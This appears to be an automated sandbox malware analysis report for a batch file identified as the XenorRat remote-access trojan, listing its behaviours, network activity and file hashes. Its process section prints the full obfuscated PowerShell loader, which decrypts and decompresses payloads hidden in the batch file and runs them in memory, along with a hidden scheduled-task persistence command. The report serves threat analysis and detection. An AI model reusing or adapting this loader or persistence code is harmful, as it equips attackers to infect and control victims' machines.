Analysis Overview
SHA256
d78ea86672081dae69afc22f94de2ce5e6867653d42d9bb8d215703be3f9f25c
Threat Level: Known bad
The file Universe.bat was found to be: Known bad.
Malicious Activity Summary
XenorRat
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-23 10:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-23 10:07
Reported
2024-08-23 10:13
Platform
win11-20240802-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
XenorRat
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Universe.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SnMKy725nJUhiMQ+k00yZGWuadijDwJVVBtPnLEkkhk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('axNyr+j+G5sbsmbLId0ybw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYtig=New-Object System.IO.MemoryStream(,$param_var); $DgoBB=New-Object System.IO.MemoryStream; $zfUXx=New-Object System.IO.Compression.GZipStream($FYtig, [IO.Compression.CompressionMode]::Decompress); $zfUXx.CopyTo($DgoBB); $zfUXx.Dispose(); $FYtig.Dispose(); $DgoBB.Dispose(); $DgoBB.ToArray();}function execute_function($param_var,$param2_var){ $dTUPB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vjclB=$dTUPB.EntryPoint; $vjclB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Universe.bat';$KcJLn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Universe.bat').Split([Environment]::NewLine);foreach ($wEtNx in $KcJLn) { if ($wEtNx.StartsWith(':: ')) { $xAoQG=$wEtNx.Substring(3); break; }}$payloads_var=[string[]]$xAoQG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_735_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_735.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_735.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_735.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SnMKy725nJUhiMQ+k00yZGWuadijDwJVVBtPnLEkkhk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('axNyr+j+G5sbsmbLId0ybw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYtig=New-Object System.IO.MemoryStream(,$param_var); $DgoBB=New-Object System.IO.MemoryStream; $zfUXx=New-Object System.IO.Compression.GZipStream($FYtig, [IO.Compression.CompressionMode]::Decompress); $zfUXx.CopyTo($DgoBB); $zfUXx.Dispose(); $FYtig.Dispose(); $DgoBB.Dispose(); $DgoBB.ToArray();}function execute_function($param_var,$param2_var){ $dTUPB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vjclB=$dTUPB.EntryPoint; $vjclB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_735.bat';$KcJLn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_735.bat').Split([Environment]::NewLine);foreach ($wEtNx in $KcJLn) { if ($wEtNx.StartsWith(':: ')) { $xAoQG=$wEtNx.Substring(3); break; }}$payloads_var=[string[]]$xAoQG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp |
Files
memory/4024-0-0x00007FFD7CE53000-0x00007FFD7CE55000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rvm3ioyd.quj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4024-9-0x00000299EBFD0000-0x00000299EBFF2000-memory.dmp
memory/4024-10-0x00007FFD7CE50000-0x00007FFD7D912000-memory.dmp
memory/4024-11-0x00007FFD7CE50000-0x00007FFD7D912000-memory.dmp
memory/4024-12-0x00007FFD7CE50000-0x00007FFD7D912000-memory.dmp
memory/4024-13-0x00000299EBFC0000-0x00000299EBFC8000-memory.dmp
memory/4024-14-0x00000299EC260000-0x00000299EC294000-memory.dmp
memory/572-16-0x00007FFD7CE50000-0x00007FFD7D912000-memory.dmp
memory/572-22-0x00007FFD7CE50000-0x00007FFD7D912000-memory.dmp
memory/572-26-0x00007FFD7CE50000-0x00007FFD7D912000-memory.dmp
memory/572-29-0x00007FFD7CE50000-0x00007FFD7D912000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb15ee5741b379245ca8549cb0d4ecf8 |
| SHA1 | 3555273945abda3402674aea7a4bff65eb71a783 |
| SHA256 | b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636 |
| SHA512 | 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4 |
C:\Users\Admin\AppData\Roaming\startup_str_735.vbs
| MD5 | 51b89ca272e0cdf63b5c4093d5ca4df2 |
| SHA1 | 9c46b103a32ebd4a3e84dd969609cb344555ba02 |
| SHA256 | 3530dd622ef7dc0e24018bd889e878d3219c7396a71d80438d970561c7a8f02a |
| SHA512 | 1ca0074d9d024120a94b1ad0548ba9c3b32758c2330c5339b3f2eb7360f24c7f06353852d3496aa5c241ceab6ff45f6918eaf21e4ab203787bf75391a5c5625f |
C:\Users\Admin\AppData\Roaming\startup_str_735.bat
| MD5 | b20843491bae175a8a3ea58950133d1a |
| SHA1 | 33552409f87c4b04f1a97e21c181e27327e0f847 |
| SHA256 | d78ea86672081dae69afc22f94de2ce5e6867653d42d9bb8d215703be3f9f25c |
| SHA512 | 998bfa168786a28b6d5dc1d682ee7a75eceee58980a4a643c6c89d52a521bc592aa261c653d24f697c4e092379f63816344ff3667a6acb9d21bbeb2016d8c18b |
memory/4152-47-0x0000024199B20000-0x0000024199B32000-memory.dmp
memory/4024-48-0x00007FFD7CE53000-0x00007FFD7CE55000-memory.dmp
memory/4024-49-0x00007FFD7CE50000-0x00007FFD7D912000-memory.dmp